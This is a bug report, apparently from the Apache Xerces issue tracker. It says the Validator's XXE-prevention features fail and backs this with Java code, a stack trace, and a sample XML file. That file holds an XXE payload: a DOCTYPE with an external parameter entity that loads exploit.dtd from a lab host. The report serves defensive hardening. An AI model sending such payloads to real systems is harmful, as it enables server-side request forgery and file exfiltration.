Details
-
Bug
-
Status: Open
-
Major
-
Resolution: Unresolved
-
None
-
None
-
None
Description
During the implementation of Validator using apache xerces, setting features that prevent XML External Entity are not working. When parsing through an XML file, I consistently get DNS callbacks when attempting to load an external dtd with a DOCTYPE declaration. I am using the latest xerces version(2.12.2)
{}Attempt 1
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); Schema schema = factory.newSchema(schemaSources); Validator validator = schema.newValidator(); validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true); validator.setFeature("http://xml.org/sax/features/external-general-entities", false); validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false); validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));
sample XML file
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]> //rest of xml file
When using a validator it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is being parsed. Here's an example of an outbound call when an XML file containing a DOCTYPE declaration is being parsed through the validator.
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914) at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512) at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268) at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source) at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source) at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source) at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source) at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source) at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source) at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source) at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source) at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source) at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source) at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source) at javax.xml.validation.Validator.validate(Validator.java:124)
Instead of an outbound call, it should throw an exception for a DOCTYPE declation on the xml file. **
Attempt 2
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); Schema schema = factory.newSchema(); Validator validator = schema.newValidator(); validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
This implementation is the recommended way for external entity prevention for validators but gives this error when implemented with xerces. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source)